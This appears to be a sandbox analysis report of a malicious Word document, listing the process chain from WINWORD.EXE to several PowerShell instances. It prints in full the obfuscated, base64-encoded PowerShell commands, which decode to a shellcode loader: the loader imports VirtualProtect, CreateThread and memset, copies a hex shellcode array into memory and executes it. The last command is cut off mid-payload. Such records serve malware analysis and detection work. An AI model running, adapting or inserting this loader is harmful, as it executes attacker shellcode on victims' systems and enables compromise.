PID 4160 wrote to memory of 1020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /w 1 /C "sv hYq -;sv pjO ec;sv maq ((gv hYq).value.toString()+(gv pjO).value.toString());powershell (gv maq).value.toString() ('JABQAE4APQAnACQAUABMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABjAHIAbQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVwBRAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGYAZgAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA1ADcALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADMAMQAsAH0AZgBmACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AZQAwACwAfQBhAGQALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBjACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAO'+'AAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAHYARwA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAUABMACAALQBOAGEAbQBlACAAIgBwAHgAIgAgAC0AbgBhAG0AZQBzACAAcQB5AGIAOwAkAHYARwA9ACQAdgBHAC4AcgBlAHAAbABhAGMAZQAoACIAcQB5AGIAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0ACIAKwAiAGkAIgArACIAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAVwBRACAAPQAgACQAVwBRAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBTAGoAbQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFMAagBtACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABzAEYAPQAwAHgAMQAwADAANwA7AGkAZgAgACgAJABXAFEALgBMACAALQBnAHQAIAAwAHgAMQAwADAANwApAHsAJABzAEYAPQAkAFcAUQAuAEwAfQA7ACQAVQBQAD0AJAB2AEcAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADcALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGMAcgBtACAAPQAgADAAOwBmAG8AcgAoACQAUwBvAD0AMAA7ACQAUwBvACAALQBsAGUAKAAkAFcAUQAuAEwAZQBuAGcAdABoAC0AMQApADsAJABTAG8AKwArACkAewAkAHYARwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAUAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABTAG8AKQAsACAAJABXAFEAWwAkAFMAbwBdACwAIAAxACkAfQA7ACQAdgBHADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAFUAUAAsACAAMAB4ADEAMAAwADcALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGMAcgBtACkAOwAkAG8AbQBsAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAHYARwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAbwBtAGwALAAkAFUAUAAsADAALAAwACwAMQAtADEAKQA7ACcAOwAkAFoATwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAUABOACkAKQA7ACQAdgBJAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHEARwA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABjAFYAVgAgAD0AIAAiAEMAOgBcACQAcQBHAFwASgB1AEcAUQBZAFcAXAAkAHEARwAkAHYASQBcAHYAMQAuADAAXAAkAHYASQAiADsAJABjAFYAVgAgAD0AIAAkAGMAVgBWAC4AcgBlAHAAbABhAGMAZQAoACIASgB1AEcAIgAsACAAIgBzAHkAcwAiACkAOwAkAGMAVgBWACAAPQAgACQAYwBWAFYALgByAGUAcABsAGEAYwBlACgAIgBRAFkAVwAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAbgBSACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAbgBSACcAKQB7ACQAdgBJAD0AIAAkAGMAVgBWAH0AOwAkAEEAaAA9ACIAIAAkAHYASQAgAEYAYwBMAFEAIAAkAFoATwAiADsAJABBAGgAPQAkAEEAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAEYAYwBMAFEAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABBAGgA')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABQAE4APQAnACQAUABMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABjAHIAbQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVwBRAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGYAZgAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA1ADcALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADMAMQAsAH0AZgBmACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AZQAwACwAfQBhAGQALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBjACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAHYARwA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAUABMACAALQBOAGEAbQBlACAAIgBwAHgAIgAgAC0AbgBhAG0AZQBzACAAcQB5AGIAOwAkAHYARwA9ACQAdgBHAC4AcgBlAHAAbABhAGMAZQAoACIAcQB5AGIAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0ACIAKwAiAGkAIgArACIAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAVwBRACAAPQAgACQAVwBRAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBTAGoAbQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFMAagBtACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABzAEYAPQAwAHgAMQAwADAANwA7AGkAZgAgACgAJABXAFEALgBMACAALQBnAHQAIAAwAHgAMQAwADAANwApAHsAJABzAEYAPQAkAFcAUQAuAEwAfQA7ACQAVQBQAD0AJAB2AEcAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADcALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGMAcgBtACAAPQAgADAAOwBmAG8AcgAoACQAUwBvAD0AMAA7ACQAUwBvACAALQBsAGUAKAAkAFcAUQAuAEwAZQBuAGcAdABoAC0AMQApADsAJABTAG8AKwArACkAewAkAHYARwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAUAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABTAG8AKQAsACAAJABXAFEAWwAkAFMAbwBdACwAIAAxACkAfQA7ACQAdgBHADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAFUAUAAsACAAMAB4ADEAMAAwADcALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGMAcgBtACkAOwAkAG8AbQBsAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAHYARwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAbwBtAGwALAAkAFUAUAAsADAALAAwACwAMQAtADEAKQA7ACcAOwAkAFoATwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAUABOACkAKQA7ACQAdgBJAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHEARwA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABjAFYAVgAgAD0AIAAiAEMAOgBcACQAcQBHAFwASgB1AEcAUQBZAFcAXAAkAHEARwAkAHYASQBcAHYAMQAuADAAXAAkAHYASQAiADsAJABjAFYAVgAgAD0AIAAkAGMAVgBWAC4AcgBlAHAAbABhAGMAZQAoACIASgB1AEcAIgAsACAAIgBzAHkAcwAiACkAOwAkAGMAVgBWACAAPQAgACQAYwBWAFYALgByAGUAcABsAGEAYwBlACgAIgBRAFkAVwAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAbgBSACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAbgBSACcAKQB7ACQAdgBJAD0AIAAkAGMAVgBWAH0AOwAkAEEAaAA9ACIAIAAkAHYASQAgAEYAYwBMAFEAIAAkAFoATwAiADsAJABBAGgAPQAkAEEAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAEYAYwBMAFEAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABBAGgA

C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe

"C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABQAEwAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQA